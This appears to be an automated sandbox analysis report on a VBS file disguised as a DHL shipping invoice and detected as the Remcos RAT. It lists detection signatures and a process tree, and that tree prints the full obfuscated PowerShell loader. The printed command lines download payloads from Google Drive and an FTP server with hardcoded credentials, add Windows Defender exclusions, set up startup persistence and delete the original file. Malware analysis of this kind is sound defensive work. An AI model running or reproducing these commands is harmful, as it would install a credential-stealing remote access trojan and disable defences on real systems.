

Windows Analysis Report
DHLShippingInvoicesAwbBL000000000102220242247.vbs

Overview

General Information

Sample name:DHLShippingInvoicesAwbBL000000000102220242247.vbs
Analysis ID:1539088
MD5:d68363e3776ef2ea3277d9b24edd935b
SHA1:dedcbb524e3fa621b716fbb4f4dea800e6279e1a
SHA256:a22fb5a6beb7587e89ed509ba36d193070c2cb7ef5cc9cb2393823037265c39b
Tags: RAT, RemcosRAT, vbs, user-abuse_ch

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Contains functionality to bypass UAC (CMSTPLUA)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Sigma detected: Copy file to startup via Powershell
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Connects to many ports of the same IP (likely port scanning)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Creates autostart registry keys with suspicious values (likely registry only malware)
Creates multiple autostart registry keys
Delayed program exit found
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Self deletion via cmd or bat file
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Script Run in AppData
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses FTP
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 5460 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 1800 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $qKKzc = 'Ow' + [char]66 + '9ADsAKQAgACkAIAAnAEQAMQ' + [char]66 + 'EACAARAAnACAALAAgAFgAUA' + [char]66 + 'VAHUAaAAkACAALAAgACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAGIAMg' + [char]66 + 'jAGEAcw' + [char]66 + 'lAC4AYw' + [char]66 + 'vAG0ALw' + [char]66 + 'jAGwAYQ' + [char]66 + 'zAHMALg' + [char]66 + '0AHgAdAAnACAAKAAgAF0AXQ' + [char]66 + 'bAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAFsAIAAsACAAbA' + [char]66 + 'sAHUAbgAkACAAKA' + [char]66 + 'lAGsAbw' + [char]66 + '2AG4ASQAuACkAIAAnAEkAVg' + [char]66 + 'GAHIAcAAnACAAKA' + [char]66 + 'kAG8AaA' + [char]66 + '0AGUATQ' + [char]66 + '0AGUARwAuACkAJwAxAHMAcw' + [char]66 + 'hAGwAQwAuADMAeQ' + [char]66 + 'yAGEAcg' + [char]66 + 'iAGkATA' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMAJwAoAGUAcA' + [char]66 + '5AFQAdA' + [char]66 + 'lAEcALgApACAAWg' + [char]66 + 'jAEIAYw' + [char]66 + 'hACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAOg' + [char]66 + 'dAG4AaQ' + [char]66 + 'hAG0Abw' + [char]66 + 'EAHAAcA' + [char]66 + '' + [char]66 + 'AC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7ACkAIAApACAAJw' + [char]66 + '' + [char]66 + 'ACcAIAAsACAAJwCTIToAkyEnACAAKA' + [char]66 + 'lAGMAYQ' + [char]66 + 'sAHAAZQ' + [char]66 + 'SAC4AZw' + [char]66 + 'TAHoAQw' + [char]66 + 'CAGwAJAAgACgAZw' + [char]66 + 'uAGkAcg' + [char]66 + '0AFMANAA2AGUAcw' + [char]66 + 'hAEIAbQ' + [char]66 + 'vAHIARgA6ADoAXQ' + [char]66 + '0AHIAZQ' + [char]66 + '2AG4Abw' + [char]66 + 'DAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'aAGMAQg' + [char]66 + 'jAGEAJAAgAF0AXQ' + [char]66 + 'bAGUAdA' + [char]66 + '5AEIAWwA7ACcAJQ' + [char]66 + 'JAGgAcQ' + [char]66 + 'SAFgAJQAnACAAPQAgAFgAUA' + [char]66 + 'VAHUAaAAkADsAKQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 
'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAHoAeA' + [char]66 + 'iAGsAbQAkACAAPQAgAGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAOwA4AEYAVA' + [char]66 + 'VADoAOg' + [char]66 + 'dAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHQAeA' + [char]66 + 'lAFQALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAuAHoAeA' + [char]66 + 'iAGsAbQAkADsAKQ' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAVwAuAHQAZQ' + [char]66 + 'OACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAoACAAPQAgAHoAeA' + [char]66 + 'iAGsAbQAkADsAKQAoAGUAcw' + [char]66 + 'vAHAAcw' + [char]66 + 'pAGQALg' + [char]66 + '6AHgAYg' + [char]66 + 'rAG0AJAA7ACkAIAAnAHQAeA' + [char]66 + '0AC4AMQAwAEwATA' + [char]66 + 'EAC8AMQAwAC8Acg' + [char]66 + 'lAHQAcA' + [char]66 + '5AHIAYw' + [char]66 + 'wAFUALw' + [char]66 + 'yAGIALg' + [char]66 + 'tAG8AYwAuAHQAYQ' + [char]66 + 'yAGIAdg' + [char]66 + 'rAGMAcw' + [char]66 + 'lAGQALg' + [char]66 + 'wAHQAZg' + [char]66 + 'AADEAdA' + [char]66 + 'hAHIAYg' + [char]66 + '2AGsAYw' + [char]66 + 'zAGUAZAAvAC8AOg' + [char]66 + 'wAHQAZgAnACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUw' + [char]66 + 'kAGEAbw' + [char]66 + 'sAG4Adw' + [char]66 + 'vAEQALg' + [char]66 + '6AHgAYg' + [char]66 + 'rAG0AJAAgAD0AIA' + [char]66 + 'nAFMAeg' + [char]66 + 'DAEIAbAAkADsAKQApACkAIAA0ADYALAA0ADYALAA2ADUALAA1ADUALAAzADUALAA5ADQALAA5ADgALAA3ADcALAA2ADYALAA1ADgALAAgADcAOQAsACAAMQAyADEALAAgADEANwAgACwAOQAxADEAIAAsADAANwAgACwANgA2ACgAXQ' + [char]66 + 'dAFsAcg' + [char]66 + 'hAGgAYw' + [char]66 + 'bACAAbg' + [char]66 + 'pAG8AagAtACgALAApACkAOQA0ACwANgAxADEALAA3ADkALAA0ADEAMQAsADgAOQAsADgAMQAxACwANwAwADEALAA5ADkALAA1ADEAMQAsADEAMAAxACwAMAAwADEAKA' + [char]66 + 'dAF0AWw' + [char]66 + 'yAGEAaA' + [char]66 + 'jAFsAIA' + [char]66 + 'uAGkAbw' + [char]66 + 'qAC0AKAAoAGwAYQ' + [char]66 + 'pAHQAbg' + [char]66 + 'lAGQAZQ' + [char]66 + 'yAEMAaw' + [char]66 + 'yAG8Adw' + 
[char]66 + '0AGUATgAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAIA' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbwAtAHcAZQ' + [char]66 + 'uACAAPQAgAHMAbA' + [char]66 + 'hAGkAdA' + [char]66 + 'uAGUAZA' + [char]66 + 'lAHIAQwAuAHoAeA' + [char]66 + 'iAGsAbQAkADsAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '6AHgAYg' + [char]66 + 'rAG0AJAA7ACkAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + '6AHgAYg' + [char]66 + 'rAG0AJAA7AGcAUw' + [char]66 + '6AEMAQg' + [char]66 + 'sACQAOwAyADEAcw' + [char]66 + 'sAFQAOgA6AF0AZQ' + [char]66 + 'wAHkAVA' + [char]66 + 'sAG8AYw' + [char]66 + 'vAHQAbw' + [char]66 + 'yAFAAeQ' + [char]66 + '0AGkAcg' + [char]66 + '1AGMAZQ' + [char]66 + 'TAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUw' + [char]66 + 'bACAAPQAgAGwAbw' + [char]66 + 'jAG8AdA' + [char]66 + 'vAHIAUA' + [char]66 + '5AHQAaQ' + [char]66 + 'yAHUAYw' + [char]66 + 'lAFMAOgA6AF0Acg' + [char]66 + 'lAGcAYQ' + [char]66 + 'uAGEATQ' + [char]66 + '0AG4AaQ' + [char]66 + 'vAFAAZQ' + [char]66 + 'jAGkAdg' + [char]66 + 'yAGUAUwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwA7AH0AZQ' + [char]66 + '1AHIAdAAkAHsAIAA9ACAAaw' + [char]66 + 'jAGEAYg' + [char]66 + 'sAGwAYQ' + [char]66 + 'DAG4Abw' + [char]66 + 'pAHQAYQ' + [char]66 + 'kAGkAbA' + [char]66 + 'hAFYAZQ' + [char]66 + '0AGEAYw' + [char]66 + 'pAGYAaQ' + [char]66 + '0AHIAZQ' + [char]66 + 'DAHIAZQ' + [char]66 + '2AHIAZQ' + [char]66 + 'TADoAOg' + [char]66 + 'dAHIAZQ' + [char]66 + 'nAGEAbg' + [char]66 + 'hAE0AdA' + [char]66 + 'uAGkAbw' + [char]66 + 'QAGUAYw' + [char]66 + 'pAHYAcg' + 
[char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAewAgAGUAcw' + [char]66 + 'sAGUAfQAgAGYALwAgADAAIA' + [char]66 + '0AC8AIA' + [char]66 + 'yAC8AIA' + [char]66 + 'lAHgAZQAuAG4Adw' + [char]66 + 'vAGQAdA' + [char]66 + '1AGgAcwAgADsAJwAwADgAMQAgAHAAZQ' + [char]66 + 'lAGwAcwAnACAAZA' + [char]66 + 'uAGEAbQ' + [char]66 + 'tAG8AYwAtACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'sAGwAZQ' + [char]66 + 'oAHMAcg' + [char]66 + 'lAHcAbw' + [char]66 + 'wADsAIA' + [char]66 + 'lAGMAcg' + [char]66 + 'vAGYALQAgACkAIAAnAHAAdQ' + [char]66 + '0AHIAYQ' + [char]66 + '0AFMAXA' + [char]66 + 'zAG0AYQ' + [char]66 + 'yAGcAbw' + [char]66 + 'yAFAAXA' + [char]66 + '1AG4AZQ' + [char]66 + 'NACAAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'TAFwAcw' + [char]66 + '3AG8AZA' + [char]66 + 'uAGkAVw' + [char]66 + 'cAHQAZg' + [char]66 + 'vAHMAbw' + [char]66 + 'yAGMAaQ' + [char]66 + 'NAFwAZw' + [char]66 + 'uAGkAbQ' + [char]66 + 'hAG8AUg' + [char]66 + 'cAGEAdA' + [char]66 + 'hAEQAcA' + [char]66 + 'wAEEAXAAnACAAKwAgAGYARA' + [char]66 + 'ZAGMAbQAkACAAKAAgAG4Abw' + [char]66 + 'pAHQAYQ' + [char]66 + 'uAGkAdA' + [char]66 + 'zAGUARAAtACAAJwAlAEkAaA' + [char]66 + 'xAFIAWAAlACcAIA' + [char]66 + 'tAGUAdA' + [char]66 + 'JAC0AeQ' + [char]66 + 'wAG8AQwAgADsAIA' + [char]66 + '0AHIAYQ' + [char]66 + '0AHMAZQ' + [char]66 + 'yAG8AbgAvACAAdA' + [char]66 + 'lAGkAdQ' + [char]66 + 'xAC8AIA' + [char]66 + 'CAGwAcA' + [char]66 + 'rAHQAIA' + [char]66 + 'lAHgAZQAuAGEAcw' + [char]66 + '1AHcAIA' + [char]66 + 'lAHgAZQAuAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAIAA7ACkAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAdQ' + [char]66 + 'vAFcAWg' + [char]66 + 'UACQAKAAgAD0AIA' + [char]66 + 'CAGwAcA' + [char]66 + 'rAHQAOwApACAAZQ' + [char]66 + 'tAGEATg' + [char]66 + 'yAGUAcw' + [char]66 + 'VADoAOg' + [char]66 + 'dAHQAbg' + [char]66 + 'lAG0Abg' + [char]66 + 'vAHIAaQ' + [char]66 + '2AG4ARQ' + [char]66 + 'bACAAKwAgACcAXA' + [char]66 + 
'zAHIAZQ' + [char]66 + 'zAFUAXAA6AEMAJwAoACAAPQAgAGYARA' + [char]66 + 'ZAGMAbQAkADsAKQAnAHUAcw' + [char]66 + 'tAC4Abg' + [char]66 + 'pAHcAcA' + [char]66 + 'VAFwAJwAgACsAIA' + [char]66 + '1AG8AVw' + [char]66 + 'aAFQAJAAgACwAQg' + [char]66 + 'LAEwAUg' + [char]66 + 'VACQAKA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAGcAcg' + [char]66 + 'kAHoAeQAkADsAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + 'nAHIAZA' + [char]66 + '6AHkAJAA7ACkAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + 'nAHIAZA' + [char]66 + '6AHkAJAA7AH0AOwAgACkAJw' + [char]66 + '0AE8ATA' + [char]66 + 'jAF8ASw' + [char]66 + 'hADMAWg' + [char]66 + 'mAG8AWAAyAEoASg' + [char]66 + 'yAFYAaA' + [char]66 + 'tAFYAOQ' + [char]66 + 'jAG0AOQ' + [char]66 + 'YAHMAdQ' + [char]66 + 'YAG0AagAxAGcAMQAnACAAKwAgAHEAcQ' + [char]66 + 'sAHIAcgAkACgAIAA9ACAAcQ' + [char]66 + 'xAGwAcg' + [char]66 + 'yACQAewAgAGUAcw' + [char]66 + 'sAGUAfQA7ACAAKQAnADIANA' + [char]66 + '1AFgASg' + [char]66 + 'UAHEAYQ' + [char]66 + 'tAGcAeQ' + [char]66 + 'NAHQARg' + [char]66 + '6AGEAaw' + [char]66 + 'QAFIAMQ' + [char]66 + 'xAF8ASQ' + [char]66 + '2AEcAaQ' + [char]66 + 'YAE4AZA' + [char]66 + 'xAGEATgAxACcAIAArACAAcQ' + [char]66 + 'xAGwAcg' + [char]66 + 'yACQAKAAgAD0AIA' + [char]66 + 'xAHEAbA' + [char]66 + 'yAHIAJA' + [char]66 + '7ACAAKQAgAEQAVw' + [char]66 + 'nAFYAcQAkACAAKAAgAGYAaQA7ACAAKQAnADQANgAnACgAcw' + [char]66 + 'uAGkAYQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAC4ARQ' + [char]66 + 'SAFUAVA' + [char]66 + 'DAEUAVA' + [char]66 + 'JAEgAQw' + [char]66 + 'SAEEAXw' + [char]66 + 'SAE8AUw' + [char]66 + 'TAEUAQw' + [char]66 + 
'PAFIAUAA6AHYAbg' + [char]66 + 'lACQAIAA9ACAARA' + [char]66 + 'XAGcAVg' + [char]66 + 'xACQAOwAnAD0AZA' + [char]66 + 'pACYAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'kAD0AdA' + [char]66 + 'yAG8AcA' + [char]66 + '4AGUAPw' + [char]66 + 'jAHUALw' + [char]66 + 'tAG8AYwAuAGUAbA' + [char]66 + 'nAG8Abw' + [char]66 + 'nAC4AZQ' + [char]66 + '2AGkAcg' + [char]66 + 'kAC8ALwA6AHMAcA' + [char]66 + '0AHQAaAAnACAAPQAgAHEAcQ' + [char]66 + 'sAHIAcgAkADsAKQAgACcAdQ' + [char]66 + 'zAG0ALg' + [char]66 + 'uAGkAdw' + [char]66 + 'wAFUAXAAnACAAKwAgAHUAbw' + [char]66 + 'XAFoAVAAkACAAKAAgAGwAZQ' + [char]66 + 'kADsAKQAoAGgAdA' + [char]66 + 'hAFAAcA' + [char]66 + 'tAGUAVA' + [char]66 + '0AGUARwA6ADoAXQ' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC4ATw' + [char]66 + 'JAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + '1AG8AVw' + [char]66 + 'aAFQAJA' + [char]66 + '7ACAAKQAgAFYAZg' + [char]66 + 'yAEQAUQAkACAAKAAgAGYAaQA7ACAAKQAyACgAcw' + [char]66 + 'sAGEAdQ' + [char]66 + 'xAEUALg' + [char]66 + 'yAG8Aag' + [char]66 + 'hAE0ALg' + [char]66 + 'uAG8AaQ' + [char]66 + 'zAHIAZQ' + [char]66 + 'WAC4AdA' + [char]66 + 'zAG8AaAAkACAAPQAgAFYAZg' + [char]66 + 'yAEQAUQAkACAAOwA=';$hsdzv = $qKKzc; ;$hsdzv = $qKKzc.replace('???' , 'B') ;;$qqbfx = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $hsdzv ) ); $qqbfx = $qqbfx[-1..-$qqbfx.Length] -join '';$qqbfx = $qqbfx.replace('%XRqhI%','C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs');powershell $qqbfx MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1928 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $QDrfV = $host.Version.Major.Equals(2) ;if ( $QDrfV ) {$TZWou = [System.IO.Path]::GetTempPath();del ( $TZWou + '\Upwin.msu' );$rrlqq = 'https://drive.google.com/uc?export=download&id=';$qVgWD = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $qVgWD ) {$rrlqq = ($rrlqq + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$rrlqq = ($rrlqq + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$yzdrg = (New-Object Net.WebClient);$yzdrg.Encoding = [System.Text.Encoding]::UTF8;$yzdrg.DownloadFile($URLKB, $TZWou + '\Upwin.msu');$mcYDf = ('C:\Users\' + [Environment]::UserName );tkplB = ($TZWou + '\Upwin.msu'); powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs' -Destination ( $mcYDf + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$lBCzSg;$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$mkbxz.Credentials = new-object System.Net.NetworkCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)),(-join [char[]](66, 70, 119, 71 ,121 ,97 ,85,66,77,89,49,53,55,56,64,64 )));$lBCzSg = $mkbxz.DownloadString( 'ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt' );$mkbxz.dispose();$mkbxz = (New-Object Net.WebClient);$mkbxz.Encoding = [System.Text.Encoding]::UTF8;$lBCzSg = $mkbxz.DownloadString( $lBCzSg );$huUPX = 'C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs';[Byte[]] $acBcZ = [System.Convert]::FromBase64String( $lBCzSg.Replace( '?:?' 
, 'A' ) );[System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType('ClassLibrary3.Class1').GetMethod( 'prFVI' ).Invoke( $null , [object[]] ( 'txt.ssalc/moc.esac2b//:sptth' , $huUPX , 'D D1D' ) );};" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 6908 cmdline: powershell $S = 'C:\Windows\System32\WindowsPowerShell\v1.0' ; Add-MpPreference -ExclusionPath $S -force ; MD5: 04029E121A0CFA5991749937DD22A1D9)
          • WmiPrvSE.exe (PID: 7544 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
        • powershell.exe (PID: 7084 cmdline: powershell $S = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' ; Add-MpPreference -ExclusionPath $S -force ; MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 4852 cmdline: cmd.exe /c mkdir "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 7340 cmdline: powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\\x11.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 7372 cmdline: powershell -ExecutionPolicy Bypass -file "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\\x22.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 7820 cmdline: powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • AddInProcess32.exe (PID: 8160 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
            • AddInProcess32.exe (PID: 4456 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\qpqzbrslzlqmxxqwczcuhtgf" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
            • AddInProcess32.exe (PID: 5024 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\qpqzbrslzlqmxxqwczcuhtgf" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
            • AddInProcess32.exe (PID: 1516 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\ajvsujdnntiralmilkxwkxswwkf" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
            • AddInProcess32.exe (PID: 7744 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe /stext "C:\Users\user\AppData\Local\Temp\lladutngjbaekramcnkpuknfxzxbri" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
        • cmd.exe (PID: 7832 cmdline: cmd.exe /c del "C:\Users\user\Desktop\DHLShippingInvoicesAwbBL000000000102220242247.vbs" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cmd.exe (PID: 7996 cmdline: "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 8016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 8100 cmdline: Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 8108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • AddInProcess32.exe (PID: 5820 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
      • AddInProcess32.exe (PID: 7388 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
  • cmd.exe (PID: 3804 cmdline: "C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\Roaming\Program Rules NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\Update Drivers NVIDEO\qkbrq.ps1' ";exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
